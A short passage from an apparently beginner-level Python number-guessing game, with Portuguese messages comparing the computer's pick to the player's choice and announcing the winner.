# Normal case (0 to 5)
else:
print('A escolha do PC foi {}\nA sua escolha foi {}\n\n'.format(pc, escolha))
    # Determine the winner
if pc == escolha:
print('AH, NÃO!. VOCÊ VENCEU!!!!!')
else:
print('HAHAHA. VENCI DE VOCÊ!!!!!!!!!!!!!!!!!!!!!!!!!')
print('FIM.')
|